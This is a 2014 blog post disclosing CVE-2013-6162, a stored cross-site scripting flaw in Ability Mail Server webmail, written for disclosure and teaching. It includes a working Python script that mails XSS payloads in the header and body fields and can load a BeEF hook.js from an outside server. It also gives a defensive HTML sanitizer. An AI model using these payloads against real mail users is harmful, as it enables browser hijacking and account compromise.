Wednesday, January 22, 2014

Kriss Kross Site Scripting in Ability Mail Server - CVE-2013-6162

Cross Site Scripting

Cross Site Scripting (XSS) is a class of attack in which an attacker gets a legitimate website or web application to deliver a payload, usually JavaScript, to its users' browsers. The user's browser receives that payload and executes it, whatever it may be. Essentially, the attacker is taking advantage of the fact that the browser trusts whatever the web application sends it and runs it with no questions asked. Cross Site Request Forgery (CSRF) is the mirror image: the web application trusts that whatever requests arrive from the user's browser reflect the user's intent and carries them out with no questions asked. We'll get to CSRF in a later post. You can read more about XSS and its various flavors here.

Anyways, XSS is often dismissed as low impact because the quintessential XSS proof of concept is throwing up an alert box. Big whoop. Well, not so fast... it sits at number three on the 2013 OWASP Top 10 (CSRF is number eight), so there's gotta be more to it. Let's dig in.

CVE-2013-6162

CVE-2013-6162 is an XSS vulnerability I discovered in Ability Mail Server 3.1.1. It's a fairly simple XSS vulnerability to demonstrate, but I think it serves as a good example of the kind of impact XSS can have. After installing Ability Mail Server (AMS) and its webmail component, we created a victim account to test against.

First things first, we fuzz the various fields of an email. That means injecting JavaScript into the From, To, Subject, Date, and similar headers and seeing whether any of them triggers an alert box when the message is viewed. Eventually we try injecting into the body of the email.

Once we run that script, we log in with the victim account and view the email.

Success! We've been able to get the browser to execute JavaScript of our choosing.

Now, the textbook XSS attack is to dump the user's session cookie and replay it to log in as that user. Unfortunately, I didn't get a cookie when I attempted this (a session cookie flagged HttpOnly, for instance, never shows up in document.cookie). So, what else could we do? I had never tried BeEF via XSS, only through its demo page, so I decided to check it out. BeEF (the Browser Exploitation Framework) is a tool for executing commands against a victim's browser. The one stipulation is that the victim's browser must load BeEF's hook.js script, which is what allows all of the magic. BeEF is a really great tool and you can read more about it here. I updated my proof of concept to load hook.js, fired up BeEF in Kali, and fired away.
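The probe message from the fuzzing step and the hook-loading proof of concept above, as an added example that is not the author's script and not anything from Ability Mail Server. It puts a distinct canary in the From, To and Subject headers and in the HTML body (the body also carries an onerror and an onload vector, which goes slightly beyond the page, for filters that only strip script tags), optionally appends a script tag pointing at a BeEF hook.js URL, and includes a check that, given the HTML the webmail client later serves, reports which canaries came through unescaped. The addresses, the 127.0.0.1:25 SMTP target and the hook URL are placeholders:

```python
"""Probe message for webmail XSS: a distinct canary per rendered field, an optional
BeEF hook.js loader, and a check on the page the client serves back. Added example
for this write-up, not the author's script; addresses, SMTP target and hook URL are
placeholders."""
import smtplib
from email.message import EmailMessage
from typing import List, Optional

PROBE_FIELDS = ("from", "to", "subject", "body")


def canary(field: str) -> str:
    # One alert per field, so the box that pops tells you which field the client
    # rendered without escaping.
    return f"<script>alert('xss-{field}')</script>"


def build_probe_message(sender: str = "probe@attacker.test",
                        victim: str = "victim@mail.test",
                        hook_url: Optional[str] = None) -> EmailMessage:
    msg = EmailMessage()
    # Display names are RFC 5322 quoted-strings, so "<", ">" and "(" are legal
    # there; the mailbox after them is what the MTA actually uses.
    msg["From"] = f'"{canary("from")}" <{sender}>'
    msg["To"] = f'"{canary("to")}" <{victim}>'
    msg["Subject"] = canary("subject")
    vectors = [
        canary("body"),
        # Event-handler vectors, for a filter that only strips <script> tags.
        "<img src=x onerror=\"alert('xss-body-onerror')\">",
        "<svg onload=\"alert('xss-body-svg')\"></svg>",
    ]
    if hook_url:
        # The victim's browser fetches BeEF's hook.js and is then driven from
        # the BeEF console, no cookie required.
        vectors.append(f'<script src="{hook_url}"></script>')
    body = "<html><body>\n<p>probe</p>\n" + "\n".join(vectors) + "\n</body></html>"
    msg.set_content(body, subtype="html")
    return msg


def send_probe(msg: EmailMessage, sender: str, victim: str,
               host: str = "127.0.0.1", port: int = 25) -> None:
    # Envelope sender/recipient are passed explicitly so the canaries in the
    # headers never influence delivery.
    with smtplib.SMTP(host, port, timeout=10) as smtp:
        smtp.send_message(msg, from_addr=sender, to_addrs=[victim])


def unescaped_fields(rendered_html: str) -> List[str]:
    """Given the HTML the webmail client served for the probe, return the fields
    whose canary survived verbatim (it would execute). An escaped canary shows up
    as &lt;script&gt;... and is not matched."""
    return sorted(f for f in PROBE_FIELDS if canary(f) in rendered_html)


if __name__ == "__main__":
    # Placeholder BeEF hook URL; point it at your own BeEF instance.
    probe = build_probe_message(hook_url="http://192.0.2.10:3000/hook.js")
    send_probe(probe, "probe@attacker.test", "victim@mail.test")
```

Run it as a script to deliver the probe, then save the inbox page the webmail client renders for the victim and feed it to unescaped_fields; a field that comes back as &lt;script&gt; was escaped correctly, and any field the function lists is the one that will execute.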

Upon opening the email...

Sweet!

I had not had the opportunity to load BeEF via XSS before, so this was a new wrinkle.

While this CVE deals with XSS and abusing the trust a browser places in a website, I was also able to leverage this vulnerability into a CSRF attack. I'll detail that in another post.
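For completeness, the server-side fix this class of bug calls for, as an added example that is not Ability Mail Server's code: a webmail client must never hand a message body to the browser verbatim. The first function is the vulnerable pattern; the sanitizer after it is the hardened one. The allowlist of tags and attributes is an illustrative choice, and a real deployment would also set a Content-Security-Policy header so that a sanitizer miss still cannot run inline script.

```python
"""Rendering an email body for a webmail client: the vulnerable pattern beside a
hardened allowlist sanitizer. Added example for this write-up, not Ability Mail
Server's code; the allowlist is an illustrative choice."""
from html import escape
from html.parser import HTMLParser

# What the vulnerable webmail does: the message body goes to the browser as-is,
# so any <script> or event handler an attacker mailed in runs in the victim's session.
def render_body_unsafe(content: str) -> str:
    return content


ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "pre", "code", "img", "div", "span",
                "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")
VOID_TAGS = {"br", "img"}


def safe_url(value: str) -> bool:
    # Browsers ignore whitespace and control characters inside a scheme, so a
    # "java\tscript:" URL must be caught too: strip them before comparing.
    compact = "".join(ch for ch in value if ch.isprintable() and not ch.isspace()).lower()
    return compact.startswith(SAFE_SCHEMES)


class BodySanitizer(HTMLParser):
    """Allowlist filter: unknown tags vanish, <script>/<style> vanish with their
    contents, every attribute not on the allowlist (all on* handlers included) is
    dropped, and URL attributes must carry an http/https/mailto scheme."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
            return
        if self._skip or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output, so "<" typed in a message stays text.
        if not self._skip:
            self.out.append(escape(data, quote=False))


def sanitize_html(fragment: str) -> str:
    parser = BodySanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_body(content: str, subtype: str) -> str:
    """Hardened rendering: text/plain is entity-escaped, text/html goes through
    the allowlist sanitizer."""
    if subtype == "html":
        return sanitize_html(content)
    return f"<pre>{escape(content, quote=True)}</pre>"
```

The sanitizer is deliberately an allowlist: a blocklist of known-bad tags is what leaves the onerror and onload vectors alive once script tags are stripped.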


13 comments:

  1. Is this some kind of cyber virus for Windows? How can we all protect our systems from this dangerous virus, if it is one?

  4. I have been looking for this information for the whole day. I didn't even think that I would find it. Fortunately, I did.

  5. I really enjoy reading your article. I wanted to let you know that you have people like me who appreciate your work.
